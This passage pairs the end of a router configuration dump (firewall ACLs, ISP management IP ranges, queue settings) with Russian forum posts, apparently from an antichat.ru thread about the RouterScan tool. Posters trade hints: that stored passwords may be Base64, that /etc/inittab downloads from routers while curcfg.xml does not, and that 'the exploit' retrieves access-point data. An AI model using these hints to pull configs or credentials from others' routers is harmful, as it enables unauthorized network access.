<ACLInstance InstanceID="4" X_Service="TELNET" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
</ACL>
</FilterModeInstance>
<FilterModeInstance InstanceID="7" Level="JAZZTEL" Revisable="1" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0">
<IpFilter NumberOfInstances="2">
<ObjExtention MaxInstanceNum="4"/>
<IpFilterInstance InstanceID="3" Name="1" Status="1" Priority="0" Interface="ALL" SourceIPStart="87.216.1.1" SourceIPEnd="87.216.1.254" DestIPStart="" DestIPEnd="" Protocol="TCP/UDP" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/>
<IpFilterInstance InstanceID="4" Name="2" Status="1" Priority="0" Interface="ALL" SourceIPStart="87.216.1.1" SourceIPEnd="87.216.1.254" DestIPStart="" DestIPEnd="" Protocol="ICMP" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/>
</IpFilter>
<DosAttack SynFlooding="0" IcmpFlooding="0" ArpAttack="0"/>
<ACL NumberOfInstances="9">
<ObjExtention MaxInstanceNum="9"/>
<ACLInstance InstanceID="1" X_Service="ACS" X_Direction="WAN" X_StartIpAddr="" X_EndIpAddr=""/>
<ACLInstance InstanceID="2" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
<ACLInstance InstanceID="3" X_Service="ICMP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
<ACLInstance InstanceID="4" X_Service="TELNET" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
<ACLInstance InstanceID="5" X_Service="HTTP" X_Direction="WAN" X_StartIpAddr="87.216.1.1" X_EndIpAddr="87.216.1.254"/>
<ACLInstance InstanceID="6" X_Service="ICMP" X_Direction="WAN" X_StartIpAddr="" X_EndIpAddr=""/>
<ACLInstance InstanceID="7" X_Service="TELNET" X_Direction="WAN" X_StartIpAddr="87.216.1.1" X_EndIpAddr="87.216.1.254"/>
<ACLInstance InstanceID="8" X_Service="FTP" X_Direction="WAN" X_StartIpAddr="1.1.1.1" X_EndIpAddr="1.1.1.1"/>
<ACLInstance InstanceID="9" X_Service="FTP" X_Direction="LAN" X_StartIpAddr="1.1.1.1" X_EndIpAddr="1.1.1.1"/>
</ACL>
</FilterModeInstance>
</FilterMode>
</X_FireWall>
<QueueManagement Enable="0" X_BandWidth="0" X_QueueType="PQ" MaxQueues="4" MaxClassificationEntries="32">
<Queue NumberOfInstances="4">
<ObjExtention MaxInstanceNum="4"/>
<QueueInstance InstanceID="1" QueueEnable="1" QueueWeight="1"/>
<QueueInstance InstanceID="2" QueueEnable="1" QueueWeight="1"/>
<QueueInstance InstanceID="3" QueueEnable="1" QueueWeight="1"/>
<QueueInstance InstanceID="4" QueueEnable="1" QueueWeight="1"/>
</Queue>
<Policer NumberOfInstances="4">
<ObjExtention MaxInstanceNum="4"/>
<PolicerInstance InstanceID="1" PolicerEnable="1" CommittedRate="0" CommittedBurstSize="0" PeakRate="0" PeakBurstSize="0"/>
<PolicerInstance InstanceID="2" PolicerEnable="1" CommittedRate="0" CommittedBurstSize="0" PeakRate="0" PeakBurstSize="0"/>
<PolicerInstance InstanceID="3" PolicerEnable="1" CommittedRate="0" CommittedBurstSize="0" PeakRate="0" PeakBurstSize="0"/>
<PolicerInstance InstanceID="4" PolicerEnable="1" CommittedRate="0" CommittedBurstSize="0" PeakRate="0" PeakBurstSize="0"/>
</Policer>
</QueueManagement>
</InternetGatewayDevice>
</InternetGatewayDeviceConfig>

P.S. Судя по http://www.securitylab.ru/analytics/483834.php пароль может быть в BASE64

 

Интересно от чего зависит наличие /var/curcfg.xml. Я раньше сколько ни пробовал, /etc/inittab скачивается, а curcfg.xml нет.

 

binarymaster а фильтрация по правилам "белого" списка будет ?

 

https://forum.antichat.ru/posts/4002151

 

RSTest.7z (1.3 МБ)
Загружен 9 дней наза
Файл удален
Можно перезолить?

 

???
https://forum.antichat.ru/posts/4006682

 

Обратил внимание нет авторизации и MAC , делал рескан, так же без результата .

 

Это нормально. Эксплойт смог добыть данные точки доступа, но доступа к BSSID при таком раскладе нет.

RS всегда добывает то, что способен добыть. Посылая подобные скриншоты, предже всего задавайте себе вопрос "А должен ли RS добыть что-то ещё? Если да, каким образом?"

На второй вопрос ответ должен быть чисто техническим, в виде алгоритма получения данных, а также проверенным лично.

 

Стоит ли надеяться на реализацию https://forum.antichat.ru/threads/398971/page-122#post-4008991 ?

 

Как вы прикручиваете этот скрипт к RouterScan?